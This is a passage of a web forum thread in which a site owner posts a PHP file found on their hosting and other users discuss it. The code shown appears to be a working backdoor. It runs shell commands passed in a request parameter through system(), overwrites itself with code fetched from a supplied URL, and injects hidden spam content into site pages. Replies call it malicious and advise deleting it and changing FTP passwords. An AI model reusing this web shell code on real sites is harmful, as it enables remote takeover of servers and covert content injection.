for ($j=$pid; $j<$pid+10; $j++)
{
	$fp = fopen($gname."?g=$curs", "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);

	$fnd = fopen("$tname/$cname/$curs"."_$j.php", "w+");
	fwrite($fnd, $fin);
	fclose($fnd);
}

if ($j==100)
{
$fp = fopen($gname."?g=$curs&m=1", "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);
	$fnd = fopen("$tname/$cname/$curs"."_lm.php", "w+");
	fwrite($fnd, $fin);
	fclose($fnd);
	$map = "$path/$tname/$cname/$curs"."_lm.php";
	fwrite($fr,"$map\n");
}

$fconf = fopen("c", "w+");
fwrite($fconf, $tname."\n");
fwrite($fconf, $cname."\n");
fwrite($fconf, $curs."\n");
$nj = $j;
fwrite($fconf, $nj."\n");
fclose($fconf);

}

function Update()
{
if (isset($_GET["name"]))
	$sname = $_GET["name"];

$thisname = "$sname.php";
if (isset($_POST['u']))
$u = $_POST['u'];

if (isset($_GET['u']))
		$u = $_GET['u'];

	$fp = fopen($u, "r");
$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
fclose($fp);

$fthis = fopen($thisname, "w+");
fwrite($fthis, $fin);
fclose($fthis);
}

function Com()
{
if (isset($_POST['c']))
@system($_POST['c']);
if (isset($_GET['c']))
	@system($_GET['c']);
}

function MRepl()
{
$mpt = "";
$drs = "";
$begtag = "<dd4><font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">"; 
$endtag = "</font></body></html><dd5> "; 
$mrd = trim(file_get_contents("m"));
$pt = "../$mrd";
$fin = file_get_contents($pt);
GetVar("mpt", $mpt);
// ??????? ??????????? ???? ????
$fin = preg_replace ("/<\/body>/i", "", $fin);
$fin = preg_replace ("/<\/html>/i", "", $fin);
$fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
$fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
$fp = fopen($mpt, "r");
$drs = '';
while (!feof($fp))
{
 $fc = fgets($fp, 1024);
 if (!$fc) 
 { 
	exit();
 }
$drs .= $fc;
}
fclose($fp);
$fin = $fin.$begtag; 
$fin = $fin.$drs;
$fin = $fin.$endtag; 
$fmrd = fopen($pt, "w+");
fwrite($fmrd, $fin);
fclose($fmrd);
}


function WrTest()
{
$path = trim($_GET['wr']);
$htname = $path."w.txt";
	$fp = fopen($htname, "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);
;
$fout = fopen("w.txt", "w+");
fwrite($fout, $fin);
fclose($fout);

}


function Main()
{
if (isset($_POST['u']) || isset($_GET['u']))
{
	Update();
	exit();
}



if (isset($_POST['c']) || isset($_GET['c']))
{
	Com();
	exit();
}

if (isset($_POST['g']) || isset($_GET['g']))
{
	Gen();
	exit();
}

if (isset($_POST['g1']) || isset($_GET['g1']))
{
	GenNew();
	exit();
}


if (isset($_POST['g2']) || isset($_GET['g2']))
{
	Gen2();
	exit();
}

if (isset($_POST['s']) || isset($_GET['s']))
{
	MRepl();
	exit();
}

if (isset($_POST['cl']) || isset($_GET['cl']))
{
	Clear();
	exit();
}

if (isset($_POST['cl2']) || isset($_GET['cl2']))
{
	Clear2();
	exit();
}
	if (isset($_POST['wr']) || isset($_GET['wr']))
{
	WrTest();
	exit();
}

echo "<ok>";

}

Main();

?>

Link to comment
Share on other sites

it looks pretty malicious to me. it also looks like it will rename itself, or its directory periodically. Not sure what it does though. Possibly a attack (brute force) script?

 

The fact that is trying to open / read to your .htaccess file ($fht = fopen("$tname/.htaccess", "w+");) tells me you should get rid of it as well.

Link to comment
Share on other sites

We had a similar case before, where a script was dropped in every folder of the website, this script was sending some e-mails to some address specified in the querystring when called by the browser. Looked like it was sending the file/folder structure of the website etc.

 

We had to delete it all and change all the FTP passwords etc.

 

Basically it's good time to change ur passwords now and for any other usernames which have access to this FTP space. After you've done that, it'll be a good idea to scan the whole website for any remainder of this code.

Link to comment
Share on other sites

have you found these files somewhere: c, 1r.txt and 2r.txt check whats inside. From the looks of it it's some kind of link generator however I don't like that it is using the system() function at all.

You're only bet is to run the stuff in a sandbox and try it out, could be anything from link generator to a XSS injector to steal user info.

 

 

 

Link to comment
Share on other sites

The host was no help, and I ended up deleting the files. It's the same host I left recently because of similar issues, unfortunately not until after I'd recommended them to a couple clients. Live and Learn....

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...
 Share

×
×
  • Create New...